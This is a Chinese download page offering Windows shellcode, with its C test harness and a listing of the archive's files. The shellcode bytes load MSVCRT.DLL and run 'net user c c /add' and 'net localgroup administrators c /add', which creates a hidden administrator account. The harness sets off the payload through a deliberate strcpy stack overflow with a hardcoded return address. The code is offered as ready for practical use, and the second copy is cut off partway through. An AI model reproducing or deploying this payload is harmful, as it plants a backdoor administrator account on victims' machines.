资源简介
一个shellcode,作用是添加Windows用户(同时包含shellcode和相应的汇编代码,绝对实用)
代码片段和文件信息
/*
#include
#include
char in[]=
“\x55\x8b\xec\x33\xc0\x50\x50\x50\xc6\x45\xf4\x4d\xc6\x45\xf4\x4d“
“\xc6\x45\xf5\x53\xc6\x45\xf6\x56\xc6\x45\xf7\x43\xc6\x45\xf8\x52“
“\xc6\x45\xf9\x54\xc6\x45\xfa\x2e\xc6\x45\xfb\x44\xc6\x45\xfc\x4c“
“\xc6\x45\xfd\x4c\xba\x77\x1d\x80\x7c\x52\x8d\x45\xf4\x50\xff\x55“
“\xf0\x55\x8b\xec\x33\xff\x57\x57\x57\x57\x57\xc6\x45\xee\x6e\xc6“
“\x45\xef\x65\xc6\x45\xf0\x74\xc6\x45\xf1\x20\xc6\x45\xf2\x75\xc6“
“\x45\xf3\x73\xc6\x45\xf4\x65\xc6\x45\xf5\x72\xc6\x45\xf6\x20\xc6“
“\x45\xf7\x63\xc6\x45\xf8\x20\xc6\x45\xf9\x63\xc6\x45\xfa\x20\xc6“
“\x45\xfb\x2f\xc6\x45\xfc\x61\xc6\x45\xfd\x64\xc6\x45\xfe\x64\x8d“
“\x45\xee\x50\xb8\xc7\x93\xbf\x77\xff\xd0\x55\x8b\xec\x33\xc9\x51“
“\x51\x51\x51\x51\x51\x51\x51\x51\x51\xc6\x45\xdb\x6e\xc6\x45\xdc“
“\x65\xc6\x45\xdd\x74\xc6\x45\xde\x20\xc6\x45\xdf\x6c\xc6\x45\xe0“
“\x6f\xc6\x45\xe1\x63\xc6\x45\xe2\x61\xc6\x45\xe3\x6c\xc6\x45\xe4“
“\x67\xc6\x45\xe5\x72\xc6\x45\xe6\x6f\xc6\x45\xe7\x75\xc6\x45\xe8“
“\x70\xc6\x45\xe9\x20\xc6\x45\xea\x61\xc6\x45\xeb\x64\xc6\x45\xec“
“\x6d\xc6\x45\xed\x69\xc6\x45\xee\x6e\xc6\x45\xef\x69\xc6\x45\xf0“
“\x73\xc6\x45\xf1\x74\xc6\x45\xf2\x72\xc6\x45\xf3\x61\xc6\x45\xf4“
“\x74\xc6\x45\xf5\x6f\xc6\x45\xf6\x72\xc6\x45\xf7\x73\xc6\x45\xf8“
“\x20\xc6\x45\xf9\x63\xc6\x45\xfa\x20\xc6\x45\xfb\x2f\xc6\x45\xfc“
“\x61\xc6\x45\xfd\x64\xc6\x45\xfe\x64\x8d\x45\xdb\x50\xb8\xc7\x93“
“\xbf\x77\xff\xd0“// 324字节的shellcode
“\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80“
“\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80“
“\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80“
“\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80“
“\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80“
“\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80“
“\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80“
“\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80“ // 80字节的nop覆盖缓冲区和ebp
“\x30\x1a\x42\x00“; // eip所在,覆盖成自己想要的地址,这里覆盖成 in的开始地址,如何找,我现在还不太会
// 现在我的做法是把in的地址打出来
int main()
{
char out[400];
//printf(“%p“in);
strcpy(outin);
return 0;
}
*/
////////////////////////////////////////////////////////////以上完全正确,出预期结果
#include
#include
char in[]=
“\x55\x8b\xec\x33\xc0\x50\x50\x50\xc6\x45\xf4\x4d\xc6\x45\xf4\x4d“
“\xc6\x45\xf5\x53\xc6\x45\xf6\x56\xc6\x45\xf7\x43\xc6\x45\xf8\x52“
“\xc6\x45\xf9\x54\xc6\x45\xfa\x2e\xc6\x45\xfb\x44\xc6\x45\xfc\x4c“
“\xc6\x45\xfd\x4c\xba\x77\x1d\x80\x7c\x52\x8d\x45\xf4\x50\xff\x55“
“\xf0\x55\x8b\xec\x33\xff\x57\x57\x57\x57\x57\xc6\x45\xee\x6e\xc6“
“\x45\xef\x65\xc6\x45\xf0\x74\xc6\x45\xf1\x20\xc6\x45\xf2\x75\xc6“
“\x45\xf3\x73\xc6\x45\xf4\x65\xc6\x45\xf5\x72\xc6\x45\xf6\x20\xc6“
“\x45\xf7\x63\xc6\x45\xf8\x20\xc6\x45\xf9\x63\xc6\x45\xfa\x20\xc6“
“\x45\xfb\x2f\xc6\x45\xfc\x61\xc6\x45\xfd\x64\xc6\x45\xfe\x64\x8d“
“\x45\xee\x50\xb8\xc7\x93\xbf\x77\xff\xd0\x55\x8b\xec\x33\xc9\x51“
“\x51\x51\x51\x51\x51\x51\x51\x51\x51\xc6\x45\xdb\x6e\xc6\x45\xdc“
“\x65\xc6\x45\xdd\x74\xc6\x45\xde\x20\xc6\x45\xdf\x6c\xc6\x45\xe0“
“\x6f\xc6\x45\xe1\x63\xc6\x45\xe2\x61\xc6\x45\xe3\x6c\x属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
文件 537 2009-05-20 13:31 AddUSer\AddUSer.dsw
文件 41984 2009-11-30 22:54 AddUSer\AddUSer.ncb
文件 1261 2009-06-11 21:30 AddUSer\AddUSer.plg
文件 4296 2009-05-20 13:34 AddUSer\AddUSer.dsp
文件 5936 2009-06-11 21:30 AddUSer\Adduser.cpp
文件 48640 2009-11-30 22:54 AddUSer\AddUSer.opt
文件 45056 2009-06-11 21:30 AddUSer\Debug\vc60.pdb
文件 2930 2009-06-11 21:30 AddUSer\Debug\Adduser.obj
文件 151609 2009-06-11 21:30 AddUSer\Debug\AddUSer.exe
文件 312320 2009-06-11 21:30 AddUSer\Debug\AddUSer.pdb
文件 551 2009-05-25 18:00 AddUserHuibian\AddUserHuibian.dsw
文件 41984 2009-12-18 22:54 AddUserHuibian\AddUserHuibian.ncb
文件 2756 2009-05-25 18:03 AddUserHuibian\sc.c
文件 1253 2009-05-25 18:04 AddUserHuibian\AddUserHuibian.plg
文件 4366 2009-05-25 18:23 AddUserHuibian\AddUserHuibian.dsp
文件 48640 2009-12-18 22:54 AddUserHuibian\AddUserHuibian.opt
文件 24576 2009-05-25 18:04 AddUserHuibian\Release\AddUserHuibian.exe
目录 0 2010-05-06 17:38 AddUSer\Debug
目录 0 2010-05-06 17:38 AddUserHuibian\Release
目录 0 2010-05-06 17:38 AddUSer
目录 0 2010-05-06 17:38 AddUserHuibian
----------- --------- ---------- ----- ----
738695 21
- 上一篇:各种基本运动估计算法代码
- 下一篇:EDA实验报告_时序逻辑电路_组合逻辑电路
相关资源
- shellcoder编程揭秘
- 51单片机课程设计内含50多个课程设计
- 汇编代码远程注入器
- 使用信号量实现有限缓冲区的生产者
- 22. USART_CircleBuffer 串口接收环形缓冲区
- 缓冲区溢出实验
- 串口缓冲区 循环队列
- Q版缓冲区溢出教程PDF版
- 实验指导:ArcGIS缓冲区分析与叠加分
- CSAPP_buflab 解答详细过程(内含源程序
- mips 五级流水线 带转发 带汇编代码
- 缓冲区查询
- Penetration Testing with Shellcode 无水印转化
- Q版缓冲区溢出教程内涵源代码
- 电子闹钟《微机接口与汇编语言》源
- linux下缓冲区溢出攻击源代码
- 网络攻击与防范之缓冲区溢出实验
- AE二次开发缓冲区分析详细步骤
- 汇编语言贪吃蛇、俄罗斯方块双任务
- arcgis api for js 缓冲区分析
- 编译原理实验代码四则表达式编译及
- 缓冲区溢出攻击
- TMS320C6416芯片二次bootloader的汇编代码
- 汇编代码直接转换二进制数据
- verilog fifo 乒乓缓冲区操作
- 机器码转汇编代码的工具
- 缓冲区溢出实验(The Buffer Bomb)解答
- ArcGIs Server 缓冲区查询源码
- war-ftpd 缓冲区溢出
- AE缓冲区代码 + ArcEngine连接表join
川公网安备 51152502000135号
评论
共有 条评论